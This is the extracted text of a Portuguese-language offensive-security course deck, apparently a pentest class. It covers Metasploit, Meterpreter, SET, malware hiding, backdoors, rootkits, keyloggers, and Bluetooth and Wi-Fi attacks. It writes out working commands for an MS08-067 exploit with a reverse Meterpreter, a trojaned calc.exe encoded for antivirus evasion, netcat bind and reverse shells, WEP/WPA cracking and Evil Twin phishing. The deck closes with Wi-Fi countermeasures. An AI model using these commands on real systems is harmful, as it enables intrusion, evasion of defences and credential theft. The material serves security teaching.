192.168.10.1 set LPORT 443 set RHOST 192.168.10.2 Marcos Flávio Araújo Assunção MSFConsole – set payload e show options set PAYLOAD windows/meterpreter/reverse_tcp show options Marcos Flávio Araújo Assunção MSFConsole - Exploit Depois de todas as variáveis já devidamente configuradas para executar o comando exploit para realizar a exploração Marcos Flávio Araújo Assunção Meterpreter Marcos Flávio Araújo Assunção Meterpreter O MSF trabalha com vários tipos de payloads, mas o melhor de todos é o meterpreter. Algumas características dele: • Roda diretamente na memória RAM, sem uso do disco. • Permite a execução de diversas tarefas como (shell, download e upload de arquivos, keylogger, sniffer, screenshot,RDP, etc). • Permite migrar o processo para outro executável e inicializar com o sistema • Permite limpar os rastros nos logs e finalizar anti-vírus • Permite elevar os privilégios de usuário Marcos Flávio Araújo Assunção Alguns comandos do Meterpreter • ps -> Lista processos em execução • shell -> Acessa o prompt de comandos • clearev -> Limpa os logs. • run vnc -> Instala o VNC remotamente. • getsystem -> Obtém o usuário system. • keyscan_start -> Inicia o keylogger. • migrate -> Migra para outro processo. • run migrate -> Migra automaticamente • screenshot -> Tira um screenshot da tela • download -> Faz download de um arquivo Marcos Flávio Araújo Assunção Meterpreter – Exemplo ps Marcos Flávio Araújo Assunção Meterpreter – Exemplo migrate Marcos Flávio Araújo Assunção Meterpreter – Exemplos pwd e ls pwd -> Mostra diretório atual ls -> Lista arquivos/diretórios Marcos Flávio Araújo Assunção Meterpreter – Download e Upload Sintaxe: download <arquivo> <local> upload <arquivo> <local> Marcos Flávio Araújo Assunção Meterpreter – Listando Tokens Marcos Flávio Araújo Assunção Meterpreter Ex: getsystem, clearev e screenshot Marcos Flávio Araújo Assunção Meterpreter keyscan_start e sniffer_start Observação: keyscan_stop e sniffer_stop encerram as atividades. keyscan_dump obtém o arquivo com as teclas digitadas. Marcos Flávio Araújo Assunção Meterpreter – Exemplo shell Marcos Flávio Araújo Assunção Msfcli Marcos Flávio Araújo Assunção Msfcli O msfcli permite fazer tudo o que o msfconsole faz mas diretamente do shell, em uma única linha de comando. É muito prático quando usado em scripts. Sintaxe: msfcli <módulo> <payload> <variáveis> <modo> Em modo normalmente utilizando a opção E para permitir a execução imediata do exploit. Marcos Flávio Araújo Assunção Msfcli – Exemplo real msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.10.2 LHOST=192.168.10.1 LPORT=443 E No exemplo acima estamos executando o msfcli contra o host remoto (RHOST) 192.168.10.2 configurando como PAYLOAD o meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT). Marcos Flávio Araújo Assunção Msfpayload Marcos Flávio Araújo Assunção Msfpayload Permite converter qualquer um dos payloads do metasploit para um arquivo puro(raw) ou mesmo um executável. Isso permite que você possa utilizar o payload como um backdoor comum. Sintaxe: msfpayload <payload> <variáveis> <modo> Em modo normalmente utilizando a opção X para permitir que o payload executável seja criado. Marcos Flávio Araújo Assunção Msfpayload msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 X > backdoor.exe No exemplo acima estamos gerando o executável backdoor.exe ao rodar o msfpayload como PAYLOAD do meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT). Se for um payload de conexão reversa é necessário um Multi- Handler no MSFConsole ou MSFCli para receber a conexão de volta. No próximo slide veremos como criar um. Marcos Flávio Araújo Assunção Multi-Handler: Msfconsole x Msfcli Marcos Flávio Araújo Assunção Msfencode Marcos Flávio Araújo Assunção Msfencode Permite codificar qualquer um dos payloads em arquivo puro(raw) gerados pelo msfpayload. O objetivo é fazer com que assim o payload não seja detectado por anti-vírus e ferramentas de IDS. Sintaxe: msfencode –i <arq> -e <encoder> -c <vezes> -t <modo> -o <arq> Opções mais comuns: -i -> arquivo de entrada -e -> tipo de encoder. Ex: x86/shikata_ga_nai -c -> vezes que o encoder irá codificar. -t -> tipo de arquivo gerado. Normalmente é exe. -o -> arquivo de saída -x -> executável para ser usado como base -k -> Permite execução paralela (usado com o –x). Marcos Flávio Araújo Assunção Msfencode – Uso com arquivo raw msfencode -t exe –i backdoor.raw -o backdoor.exe -e x86/shikata_ga_nai -c 5 Marcos Flávio Araújo Assunção Msfpayload + Msfencode (única linha) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 R > msfencode –x calc.exe -k -o calcmalvada.exe -e x86/shikata_ga_nai -c 7 –t exe Marcos Flávio Araújo Assunção Fast-Track Marcos Flávio Araújo Assunção Fast-Track Foi criado como um complemento para o Metasploit. Permite automatizar exploração (autopwn), realizar ataques ao lado cliente, executar SQL injection e diversas outras tarefas. Possui um modo gráfico e console. Utilizaremos somente o segundo modo. Para acessá-lo basta digitar ./fast-track.py -i Marcos Flávio Araújo Assunção Fast-Track – Menu principal Marcos Flávio Araújo Assunção Fast-Track - Atualização Marcos Flávio Araújo Assunção Fast-Track - Autopwn A opção autopwn seleciona automaticamente diversos tipos de exploits e os utiliza contra o alvo, aumentando a chance da exploração ser bem sucedida. Entretanto, o autopwn é mais fácil de detectar por um sistema de IDS. Marcos Flávio Araújo Assunção Fast-Track – NMAP Engine Marcos Flávio Araújo Assunção Fast-Track SQL Inject Marcos Flávio Araújo Assunção Fast-Track – SQL Inject Marcos Flávio Araújo Assunção Fast-Track Mass Client Attack Marcos Flávio Araújo Assunção Fast-Track – Exploits diversos Marcos Flávio Araújo Assunção Fast-Track Binary to Hex Marcos Flávio Araújo Assunção Fast-Track – Payload Generator Marcos Flávio Araújo Assunção SET (Social Engineering Tool) Marcos Flávio Araújo Assunção SET Também foi criado como um complemento para o Metasploit. Consegue criar modelos falsos de websites, enviar e-mail em massa, criar phishing, gerar documentos com falhas, criar um ataque Wireless e muito mais. Para iniciar acesse o diretório /pentest/exploits/set e digite o comando: ./set Marcos Flávio Araújo Assunção SET – Menu principal Marcos Flávio Araújo Assunção SET – Menu Engenharia Social Marcos Flávio Araújo Assunção SET – Spear Phishing Marcos Flávio Araújo Assunção SET – Mass E-mailer Marcos Flávio Araújo Assunção SET - WebAttack Marcos Flávio Araújo Assunção SET – Ataque autorun USB/CD Marcos Flávio Araújo Assunção SET – Create payload and listener Marcos Flávio Araújo Assunção SET – Java Applet Attack Marcos Flávio Araújo Assunção SET – Ataques equipamentos Arduino Marcos Flávio Araújo Assunção SET – Wireless Fake AP Attack Marcos Flávio Araújo Assunção Vulnerabilidades de Malware Marcos Flávio Araújo Assunção Definição Malicious Software Origem Objetivos Malwares passivos Malwares ativos Risco Marcos Flávio Araújo Assunção Métodos de Infecção dos Malwares Marcos Flávio Araújo Assunção E-mail Simples Rápido Confiável Contatos Fake mail Phishing Marcos Flávio Araújo Assunção Messengers MSN ICQ GoogleTalk Confiabilidade Menor desconfiança Eficiência Marcos Flávio Araújo Assunção Código móvel ActiveX Javascript VBScript Sites maliciosos Navegador desatualizado Marcos Flávio Araújo Assunção Falhas Buffer overflows Elevação de privilégios SQL Injection XSS Marcos Flávio Araújo Assunção Mídia de armazenamento CD DVD Pen-Drive Autorun Curiosidade Menor desconfiança Marcos Flávio Araújo Assunção Métodos de Ocultamento Marcos Flávio Araújo Assunção Binders Juntar programas Jogo + backdoor Execução programada Alteração do registro Senna Spy Wordpad Marcos Flávio Araújo Assunção Steganografia Método eficiente Burla proteções Imagens MP3 Binários Espaçamento Marcos Flávio Araújo Assunção Edição/remoção de recursos binários Permite “mudar” a estrutura binária de um malware, dificultando detecção por AVs Marcos Flávio Araújo Assunção Edição hexadecimal Permite “mudar” certas strings em um software, tentando com isto dificultar a detecção por AVs Marcos Flávio Araújo Assunção Ocultamento do Firewall Proteção “cara-crachá” Filtro de pacotes - Spoofing - Porta de origem - Conexão reversa Sandbox - DLL injection Personal Firewall killing (processo) Tunneling - HTTP (proxy) - ICMP (ping) - DNS Marcos Flávio Araújo Assunção Ocultamento do IDS Assinatura Comportamento Fragmentação Tunelamento Criptografia Marcos Flávio Araújo Assunção Ocultamento do Anti-Virus Assinatura Edição recursos Editor Hexa Compressão do executável Polimorfismo de código Marcos Flávio Araújo Assunção Alternate Data Streams Permite criar “camadas” de dados adicionais em sistemas NTFS Exemplo: texto.txt:virus.exe Pode ser aberto com o comando start. Ex: start c:\teste\texto.txt:oculto.txt Marcos Flávio Araújo Assunção Backdoors Marcos Flávio Araújo Assunção Definição Porta dos fundos Easter Egg Senhas Modificação de serviços originais Criação de novo serviço Marcos Flávio Araújo Assunção NetCat Muito conhecido Canivete Suiço CryptoCat Cliente Serviço local Conexão reversa Marcos Flávio Araújo Assunção Netcat – Conexão direta Este método é relativamente o mais simples, mas também o mais facilmente detectado e impedido. O atacante já precisa possuir acesso prévio ao sistema que deseja infectar. Ele então roda o Netcat no sistema alvo, abrindo uma porta TCP e anexando um processo de shell a ela. O seguinte comando por exemplo funcionaria em sistemas Windows: nc –L –p 100 –e cmd.exe –vv A opção –d poderia ser utilizada para “esconder” o processo da console. Basta agora o atacante se conectar via telnet ou nc na porta 100 do sistema infectado. Marcos Flávio Araújo Assunção Netcat – Conexão direta Marcos Flávio Araújo Assunção Netcat – Conexão reversa •Nesse método o “atacante” será o servidor. O cliente inicia a conexão. • Ele deverá abrir duas portas com o Netcat, usando quaisquer números. Tudo o que for digitado pelo cliente na primeira porta, será processado pelo shell através do pipe e mostrado como resultado na segunda porta. • Usando engenharia social ou outro método, força-se o cliente a se conectar às duas portas com telnet (ou o próprio NetCat, mais recomendado no caso do Windows) • Exemplo: Vamos supor que abri as portas 79 e 53, ambas TCP, no meu sistema. Meu endereço IP é 20.0.0.1 e agora preciso que a “vítima” digite os comandos para se conectar em mim. Exemplo: telnet 20.0.0.1 79 | /bin/sh | telnet 20.0.0.1 53 (para sistemas Linux-like) Nc 20.0.0.1 79 | cmd.exe | telnet 20.0.0.1 53 (para sistemas Windows) Marcos Flávio Araújo Assunção Netcat – Conexão reversa Marcos Flávio Araújo Assunção Tunelamento ICMP - Loki Tunelamento ICMP ICMP_ECHO ICMP_ECHOREPLY Loki Lokid Marcos Flávio Araújo Assunção Tunelamento ICMP - ICMPCMD Proof of concept Sistemas Windows Usa apenas o “ping” para se comunicar Marcos Flávio Araújo Assunção Tunelamento HTTP - Reverse WWW Backdoor The Hackers Choice “Placing Backdoors througt Firewalls” Proof of Concept Tunelamento HTTP Proxy Marcos Flávio Araújo Assunção Cavalos de Tróia Marcos Flávio Araújo Assunção Definição Objetivo Tróia Binders Windows Primeira geração Segunda geração Terceira geração Marcos Flávio Araújo Assunção Back Orifice Cult of dead cow 1997 Primeira geração Windows 9x Conexão comum Sem opção de alerta Plug-ins Marcos Flávio Araújo Assunção Netbus Carl Frederik 1998 Primeira geração Windows 9x e NT Conexão comum Alerta por e-mail Sem plug-ins Marcos Flávio Araújo Assunção SubSeven 2.1 2000 Segunda geração Windows 9x e NT Conexão comum Alerta por e-mail, ICQ e IRC Plug-ins Scanner remoto Marcos Flávio Araújo Assunção Beast 2003 Terceira Geração Conexão comum e reversa Keylogger Screenlogger DLL Injection Firewall killing Marcos Flávio Araújo Assunção Beast realizando conexão reversa Marcos Flávio Araújo Assunção Poison Ivy 2005 Terceira Geração Conexão comum e reversa Tunelament o Criptografia Webcam Farejamento remoto Marcos Flávio Araújo Assunção Dark Comet 2010 Quarta geração Possui várias novidades como: - Suporte a dns dinâmico (no ip) - Diferentes tipos de tunelamento - Cliente/server FTP - Novos métodos de ocultamento do server - Etc Marcos Flávio Araújo Assunção Rootkits Marcos Flávio Araújo Assunção Definição “Kit do root” Propagação Esconde informações vitais Nível de Aplicação Nível de Biblioteca Nível de Kernel Nível de Virtualização Marcos Flávio Araújo Assunção Hacker Defender 2002 HxDef Morphine Baseado em kernel Arquivos Processos Pastas Conexões Marcos Flávio Araújo Assunção AFX Rootkit 2005 APIs do Windows Baseado em biblioteca Processos Serviços Conexões Ícones Arquivos Marcos Flávio Araújo Assunção Zero Access Rootkit 2011 Kernel mode rootkit Infecta sistemas de 32 e 64 bits Usa falhas web (browser, java, flash) como principal método de propagação Marcos Flávio Araújo Assunção Keyloggers Marcos Flávio Araújo Assunção Definição de Keylogger Captura do teclado Interrupção Mensagens Keyloggers locais Keyloggers com envio remoto Keyloggers físicos Marcos Flávio Araújo Assunção Home Keylogger Local Simples Fácil utilização Não é detectado Grava em um arquivo de texto comum Marcos Flávio Araújo Assunção Spy Lantern Keylogger Remoto Comercial Detectado Criptografia E-mail Marcos Flávio Araújo Assunção Keylogger físico Necessita acesso Físico Versões PS2 e USB Senha para acesso ao conteúdo Versão com suporte a wi-fi Marcos Flávio Araújo Assunção Screenloggers Marcos Flávio Araújo Assunção Definição Screenshots Visual Remoto Ideal para captura de teclados virtuais Muito utilizado emvírus do tipo “Banker” Marcos Flávio Araújo Assunção Perfect Keylogger BlazingTools Comercial Grava shots no disco Envia shots por e-mail Instalação remota Marcos Flávio Araújo Assunção Ardamax Keylogger Comercial WebUpdate E-mail LAN FTP Marcos Flávio Araújo Assunção Vulnerabilidades de BlueTooth Marcos Flávio Araújo Assunção Ataques a Bluetooth War-Snipping BlueJacking BlueSnarfing BlueBugging BlueSniper Denial of Service Marcos Flávio Araújo Assunção War-Snipping Para descobrir dispositivos Envia dados aleatórios(lixo) visando uma resposta qualquer do dispositivo Permite detectar a maior parte dos dispositivos conhecidos Marcos Flávio Araújo Assunção BlueJacking Também chamado de BlueSpamming Envia um VCard para outro dispositivo No campo de identificação do nome, substitui pela mensagem Usado para BlueDating e BlueChat Marcos Flávio Araújo Assunção BlueSnarfing Roubo de informações do dispositivo Contatos, calendário Calendário Problemas no protocolo OBEX (get invés de push vcard) Dispositivos mais antigos Marcos Flávio Araújo Assunção BlueBugging Permite acesso a comandos do celular Mais poderoso que o BlueSnarfing Permite fazer chamadas, enviar SMS e até ouvir conversas alheias. Geralmente utiliza um laptop Marcos Flávio Araújo Assunção BlueSniper O BlueTooth é realmente limitado a uma comunicação de 100 metros? Marcos Flávio Araújo Assunção BlueSniper Marcos Flávio Araújo Assunção BlueSniper Permite encontrar dispositivos Bluetooth a 1 Km de distância! Marcos Flávio Araújo Assunção Vulnerabilidades de Wi-Fi Marcos Flávio Araújo Assunção Redes 802.11 (Wi-Fi) • Princípios • Frequências: 2.4GHz / 5 GHz • Canais e interferência • ESSID e BSSID • DS (Sistema de Distribuição) • IBSS ou AD-HOC • BSS • ESS Marcos Flávio Araújo Assunção BSS (Basic Service) • Associação “Conectar-se” ao Access Point • Autenticação OSA (Open System Authentication) SKA (Shared Key – WEP) PSK (WPA Personal - Pre-Shared Key) 802.1X (WPA Enterprise – Radius) Marcos Flávio Araújo Assunção ESS (Extended Service) • Desassociação “Desconectar-se” de um AP e “reconectar” em outro em um ESS. Iniciado normalmente pela estação. • Desautenticação Desautenticar uma estação wi-fi. Automaticamente ela também é desassociada. Iniciado pelo AP. Marcos Flávio Araújo Assunção Elementos de Segurança Wi-Fi • Criptografia WEP, WEP2, WEP Dinâmico WPA, WPA2 • Autenticação OSA, Shared Key (WEP), WPA-PSK, WPA-Enterprise (802.1X) • Rede invisível (ESSID oculto) • Filtro de endereços MAC • WIDS / WIPS (Wireless Intrusion Prevention System). • Outros (VLAN, proteção contra ARP no AP, etc). Marcos Flávio Araújo Assunção Ataques à redes Wireless Ataques à Infra-estrutura: Negação de Serviço (DoS) Burlando filtros de MAC WarDriving (detecção passiva/ativa) Ataques de criptoanálise/força-bruta: Decriptação de IVS no WEP (Wep Cracking) Bruteforce em handhshakes WPA Ataques ao usuário Wi-Fi: Rogue Access Point Evil Twin Ataque MITM com DNS Spoofing Marcos Flávio Araújo Assunção WarDriving – Detectando e mapeando redes Wi-Fi Marcos Flávio Araújo Assunção Wardriving Mapeamento de redes wireless Usado como método de descoberta passiva de redes Tecnicamento envolve o uso de um automóvel para gravar informações wireless sobre uma larga àrea Warflying utilizam aviões ao invés de automóveis Wardriving em si não é uma atividade ilegal Usar o sinal de rádio para se conectar a redes sem a permissão do dono é ilegal Marcos Flávio Araújo Assunção Hardware para o wardriving Marcos Flávio Araújo Assunção Hardware para o Wardriving Computadores móveis Notebook/tablets Smartphones Interface de rede Wireless Possui diversas formas e estilos Formato USB Placa PCI Placa PCMCIA Cartão CompactFlash (CF) Marcos Flávio Araújo Assunção Hardware para o wardriving Antenas Anexando uma antena externa irá aumentar muito o alcance da descoberta das redes wireless Características fundamentais Se a frequência aumenta o comprimento de onda diminui. Se o ganho da antena aumenta a àrea de cobertura diminui Marcos Flávio Araújo Assunção Hardware para o wardriving Antenas (continuação) Categorias básicas Omni-direcional • Detecta igualmente sinais de todas as direções Semi-direcional • Foca em uma direção específica Direcional • Envia o sinal em uma direção bem definida (ângulo bem fechado) Marcos Flávio Araújo Assunção Hardware para o wardriving Marcos Flávio Araújo Assunção Antena e NIC sugeridos Antena e NIC de 58dbi e 8000mw Modelo: EDUP EP-MS8515GS Chipset: Ralink 3070L e Realtek 187L Alcance do sinal: + de 5 KM Marcos Flávio Araújo Assunção Hardware para o wardriving Marcos Flávio Araújo Assunção Hardware para o wardriving Marcos Flávio Araújo Assunção Softwares para o wardriving Aplicações open-source Kismet Roda em sistemas Linux (existe porte para Windows) Pode reportar dados similares ao NetStumbler Também suporta GPS Pode capturar pacotes e salvá-los em um arquivo airodump-ng Possui quase todos os recursos do Kismet (menos o GPS). Permite integração com outras ferramentas da suíte NG. Marcos Flávio Araújo Assunção WarDriving - Kismet Marcos Flávio Araújo Assunção WarDriving – airodump-ng Marcos Flávio Araújo Assunção Denial of Service (Recusa de serviço) em redes Wi-Fi Marcos Flávio Araújo Assunção Ataques Denial of Service (DoS) Ataques DoS no Wireless Negam o acesso de dispositivos wi-fi ao AP Categorias Ataques da camada física Ataques da camada de enlace (MAC) Ataques da camada física Inunda o espectro com interferência eletromagnética Para prevenir ao dispositivo de se comunicar com o AP Marcos Flávio Araújo Assunção DoS Camada física Marcos Flávio Araújo Assunção DoS Camada de Enlace (MAC) Marcos Flávio Araújo Assunção Filtro de MAC e Redes ocultas Marcos Flávio Araújo Assunção Aplicando Filtro de MAC Marcos Flávio Araújo Assunção Trocando o MAC da estação Marcos Flávio Araújo Assunção Filtro de MAC “burlado” Marcos Flávio Araújo Assunção Ocultando uma rede para protegê-la Marcos Flávio Araújo Assunção Detectando redes ocultas Mesmo que uma rede esteja oculta podemos detectar sua presença ao monitorar os probes dos dispositivos clientes no Wireshark. Isso só é possível no modo de monitoração com a interface mon0. O que é exatamente este “Modo de Monitoração”? Marcos Flávio Araújo Assunção Modo de Monitoração Neste modo (RFMON) podemos monitorar o tráfego das redes wi-fi sem precisarmos nos associar à elas. Utilitário: airmon-ng Marcos Flávio Araújo Assunção Descobrindo APs e estações com Airodump Permite monitorar redes wireless e capturar pacotes para serem analisados posteriormente. Consegue detectar Access Points em qualquer canal, mesmo estando “invisíveis”. Detecta também estações Wi-Fi associadas ou tentando seassociar. Ou seja, as máquinas dos usuários serão detectadas. Marcos Flávio Araújo Assunção Fundamentos e ataques a WEP Marcos Flávio Araújo Assunção Ataques à criptografia: WEP As vulnerabilidades são baseadas em como o WEP e a cifra RC4 são implementados WEP só pode utilizar uma chave de 64 ou 128 bits Vetor de inicialização(IV) de 24 bits e uma chave padrão de 40 ou 104 bits Tamanho relativamente pequeno da chave limita a sua força Implementação do WEP cria um padrão que pode ser detectado por atacantes IVs são números de 24 bits IVs começam a se repetir em menos de sete horas Marcos Flávio Araújo Assunção Vulnerabilidades do WEP Implementação do WEP cria um padrão que pode ser detectado por atacantes (continuação) Alguns sistemas wireless sempre começam com o mesmo IV Colisão Dois pacotes criptografados com o mesmo IV Ataque de dedução de chave Determina a chave através da análise de dois pacotes que se colidiram (mesmo IV) Marcos Flávio Araújo Assunção WEP Hacking –Airodump Primeiramente, usamos o airodump-ng para filtrar todas as redes com criptografia WEP disponíveis. No examplo acima selecionaremos a rede com o ESSID carol para realizar o ataque. airodump-ng --encrypt wep mon0 Marcos Flávio Araújo Assunção WEP Hacking - Airodump Na primeira imagem, rodamos o airodump-ng na interface mon0 filtrando: canal 11, bssid do AP da rede carol e salvando o resultado para o arquivo chaveWEP. Veja o resultado na segunda imagem. Agora, teremos que esperar. O campo “Data” deve capturar milhares de pacotes IVS para que seja possível realizar a decoficação. Tem como acelerar o processo? Marcos Flávio Araújo Assunção WEP Hacking - Aireplay Utilizando o aireplay-ng nós realizamos o ataque caffe- latte que pede aos dispositivos conectados à rede carol que nos enviem mais pacotes IVS. Com isso veja que temos mais de 40000 pacotes no campo #Data. É mais que suficiente para quebrar uma chave de 64 bits WEP. Marcos Flávio Araújo Assunção WEP Hacking - Aircrack Executamos o aircrack-ng com o nome do arquivo que foi capturado pelo airodump-ng. Veja que o número de IVS já chegava a 71406. Com isso a chave foi rapidamente quebrada. A chave utilizada é porco. Marcos Flávio Araújo Assunção Descriptografando os pacotes capturados O airdecap-ng é um utilitário que consegue descriptografar todo o tráfego armazenado em um arquivo PCAP, bastando fornecer a chave WEP ou WPA descoberta previamente. Assim, o atacante poderá utilizar o Wireshark para visualizar os dados que já foram capturados. Marcos Flávio Araújo Assunção Fundamentos e ataques a WPA Marcos Flávio Araújo Assunção Acesso Protegido Wi-Fi (WPA) Padrão do 802.11i que cuida tanto da criptografia quanto da autenticação Temporal Key Integrity Protocol (TKIP) Chaves TKIP são conhecidas como “chave por pacote” TKIP dinâmicamente gera uma nova chave para cada pacote criado Previne colisões Que era justamente uma das fraquezas principais do WEP Marcos Flávio Araújo Assunção Acesso Protegido Wi-Fi (WPA) Autenticação WPA Cumprida por usar tanto o padrão IEEE 802.1x ou tecnologia de chave previamente compartilhada (PSK) A autenticação PSK usa uma frase para gerar a chave de criptografia. Funciona como uma senha. A frase deve ser previamente inserida em cada Access Point e dispositivo Wireless. Serve como seed para gerar matematicamente as chaves de criptografia WPA foi elaborado para resolver as vulnerabilidades do WEP com um mínimo de inconveniência Marcos Flávio Araújo Assunção Acesso Protegido Wi-Fi 2 (WPA2) Segunda geração da segurança WPA Usa o Advanced Encryption Standard (AES) para criptografia dos dados Suporta autenticação IEEE 802.1x ou tecnologia PSK WPA2 permite que ambas as tecnologias AES e TKIP operem na mesma rede WLAN Marcos Flávio Araújo Assunção Configurando WPA no Roteador Marcos Flávio Araújo Assunção WPA Hacking – Airodump Assim como fizemos com o WEP, vamos filtrar no airodump-ng todas as redes que utilizem criptografia WPA e WPA2 com o comando: airodump-ng –encrypt wpa mon0 Vamos escolher a rede com o ESSID EmpresaX para realizar o ataque. Marcos Flávio Araújo Assunção WPA Hacking – Airodump Também da mesma forma filtraremos no airodump-ng: canal 6, o bssid da rede EmpresaX e salvaremos o resultado no arquivo chaveWPA. Tudo isso deve ser feito na interface mon0. Comando: airodump-ng –c 6 –bssid 50:CC:F8:85:ED:B2 –w chaveWPA mon0 O próximo passo é capturar o handshake do WPA. Isso só é possível quando algum cliente se conectar na rede. Podemos acelerar esse processo deautenticando os usuários com o aireplay Marcos Flávio Araújo Assunção WPA Hacking – Aireplay Utilizamos no aireplay o MAC do AP (-a) e o MAC do cliente (-c) que foi detectado no airodump. Enviamos 5 pacotes de desassociação . Verifique no airodump que o WPA Handshake foi capturado. Marcos Flávio Araújo Assunção Handshake WPA Verifique no airodump que o WPA Handshake foi capturado. O que fazer com isto? Entra agora o processo de força-bruta. Marcos Flávio Araújo Assunção WPA Hacking – Aircrack-ng Primeiramente, ao contrário do WEP, precisamos ter uma wordlist (lista de palavras) para tentar realizar a força-bruta no handshake WPA que foi capturado. Uma rainbow table pode ser usada para acelerar o processo. O BackTrack Linux já possui uma lista gigantesca no arquivo /pentest/passwords/wordlists/rockyou.txt (mais de 100 MB) Marcos Flávio Araújo Assunção Aircrack – Força-Bruta na chave A chave foi descoberta. É nossoprecioso Marcos Flávio Araújo Assunção WPS – Wireless Protected Setup Marcos Flávio Araújo Assunção WPA Hacking – WPS PIN Hacking O PIN foi configurado para o Wi-Fi Protected Setup. Ele é 94154016. Marcos Flávio Araújo Assunção WPA Hacking – WPS PIN Hacking No exemplo da imagem anterior eu pedi o wash para usar a interface mon0 e ignorar erros de frame check sequence (fcs). Ele encontrou a minha rede defhack e outra que também usa WPS. Marcos Flávio Araújo Assunção WPA Hacking – WPS PIN Hacking Vamos executar como exemplo o Reaver "travando" em um determinado canal (opções -f e -c 6), modo verbose (- vv) e usando o bssid do meu Access Point (-b): Marcos Flávio Araújo Assunção WPA Hacking – WPS PIN Hacking A partir deste momento o reaver irá tentar centenas de combinações até descobrir o pin. Marcos Flávio Araújo Assunção Rogue AP e Evil Twin – As piores ameaças contra redes sem fio Wi- Fi Marcos Flávio Araújo Assunção Ataques diretos através de Rogue APs e Evil Twin Access Point ilegítimo (Rogue AP) AP instalado por um funcionário Sem a aprovação ou supervisão da equipe de TI Está dentro da companhia e possui um ESSID diferente Evil Twin (fake AP) É um AP que imita o ESSID de uma rede wi-fi real. Visa enganar e confundir os clientes para que se conectem ao mesmo. Normalmente está fora do ambiente físico da empresa. Marcos Flávio Araújo Assunção Rogue APs e Evil Twin Marcos Flávio Araújo Assunção Rogue AP – Airbase-ng O utilitário Airbase-ng permite “iniciar” um Access Point via software (softAP). Isso pode facilmente ser usado em conjunto com uma rede cabeada para criar um Rogue AP. (Lembre: Rogue AP não é um Evil Twin, ESSIDs diferentes)Perceba que o airbase-ng cria uma interface at0 . Marcos Flávio Araújo Assunção Rogue AP – Visão do cliente O cliente enxerga a rede Faculdade e tenta se conectar à ela. Vamos ver se a conexão foi efetuada com sucesso. Marcos Flávio Araújo Assunção Evil Twin – Servidor DHCP Um Evil Twin pode ser configurado para fornecer endereço IP aos clientes que se conectarem ao nosso access point. Marcos Flávio Araújo Assunção Evil Twin – Desautenticando clientes originais Vamos desconectar os clientes da rede original. Iremos executar o aireplay-ng com --deauth em broadcast para toda a rede Marcos Flávio Araújo Assunção Evil Twin – Cliente recebendo IP do DHCP Perceba que o cliente pegou um endereço IP do nosso servidor DHCP. Isso significa que ele se conectou com sucesso à interface at0 criada pelo airbase-ng Marcos Flávio Araújo Assunção Evil Twin – Capturar o handshake WPA utilizando apenas a estação cliente Marcos Flávio Araújo Assunção Evil Twin – WPA Hacking Perceba no exemplo da imagem anterior que o airbase-ng levantou o Access Point utilizando o ESSID da rede defhack, o BSSID do AP real, a criptografia WPA TKIP (-z 2) e verbose (-v) para gerar mais informações úteis para debug. Marcos Flávio Araújo Assunção Evil Twin – WPA Handshake Capturamos o Handshake utilizando apenas o cliente, sem necessidade nem de ter o Access Point real por perto. Agora basta quebrar com o Aircrack-NG. Marcos Flávio Araújo Assunção Eficiência dos ataques de “força-bruta” da chave Na maioria dos casos, uma chave com uma complexidade muito alta pode levar meses. Mas e se houver outra forma? E se eu puder simplesmente... “pedir a chave”? Marcos Flávio Araújo Assunção Evil Twin – Criar um Honeypot utilizando o airbase-ng, DNS Spoofing e Apache ou SET Marcos Flávio Araújo Assunção Evil Twin – DNSSPOOF e Apache Usando os comandos mostrados realizamos: - Iniciamos o dns spoof na interface at0 (dnsspoof –i at0) - Iniciamos o Apache (apache2ctl start) Marcos Flávio Araújo Assunção Evil Twin - Apache Veja que qualquer site que o cliente abrir será direcionando para o nosso servidor Apache. Como poderíamos substituir essa página? Marcos Flávio Araújo Assunção Evil Twin – Apache com MySQL Marcos Flávio Araújo Assunção Evil Twin – Apache com MySQL Marcos Flávio Araújo Assunção Evil Twin – Social Engineering Toolkit Selecionamos o ataque no SET e escolhemos o Gmail como template. Importante: o airbase-ng e o dnsspoof devem continuar rodando em janelas separadas. Marcos Flávio Araújo Assunção Evil Twin – Página falsa do SET Marcos Flávio Araújo Assunção Evil Twin – Capturando credenciais no SET Marcos Flávio Araújo Assunção Evil Twin – Criando uma ponte Podemos criar uma bridge entre a interface at0 do AP falso e uma interface de rede ethernet (ou outra interface Wireless). Assim o cliente poderá usar a Internet. Marcos Flávio Araújo Assunção Evil Twin - Wireshark Com o Wireshark, capturamos o tráfego de Internet do usuário Marcos Flávio Araújo Assunção Evil Twin com FreeRadius – WPA Enterprise Marcos Flávio Araújo Assunção Evil Twin com FreeRadius Marcos Flávio Araújo Assunção Usando asleap para força-bruta no hash Marcos Flávio Araújo Assunção Uso de um WIDS/WIPS contra Evil Twins • Wireless Intrusion Detection/Prevention System (WIDS/WIPS) - Realiza proteção ativa/passiva de uma rede wi-fi. - Atua contra injeção de pacotes ARP, captura de handshakes WEP/WPA e auxilia na detecção de Rogue APs - Protege contra Evil Twins desassociando as estações desses APs malignos. Marcos Flávio Araújo Assunção Multipot • São vários Evil Twins criados com o airbase- ng, cada um com um MAC (BSSID) diferente. • Isso permite aumentar a concorrência entre o AP real e os falsos. • Inutiliza a “proteção” do WIPS contra Evil Twins. Marcos Flávio Araújo Assunção Multipot (Múltiplos Evil Twins) Uma antena com maior ganho (maior dBi) será decisiva na escolha do Sistema Operacional do cliente pelo AP correto. Marcos Flávio Araújo Assunção Indo além – Ataques ainda mais avançados • FakeAuth = Autenticação WEP sem precisar descobrir a chave • DNS Tunneling = Permite navegar em APs “abertos” (OSA) burlando totalmente a autenticação via browser. • Evil Twin + Metasploit = Permite explorar falhas no computador alheio, comprometendo totalmente o sistema. • Multipot + Deauth + DNS Spoofing + Bridge + Ettercap/SSL Strip= Apocalypse! Marcos Flávio Araújo Assunção Contra-medidas para os problemas e ataques apresentados em Wi-Fi Marcos Flávio Araújo Assunção Como se proteger então? • Utilizar WPA2-Enterprise com client-side certificates e múltiplas camadas de autenticação. • Implementar um WIPS com diversos sensores espalhados pelo ambiente • Implementar um HIDS (Host-based IDS) para que os ataques de desautenticação sejam impedidos a nível de host. • Definir VLANs, filtros de acesso MAC e ocultar a rede • Usar criptografia nos protocolos e serviços de camadas superiores. 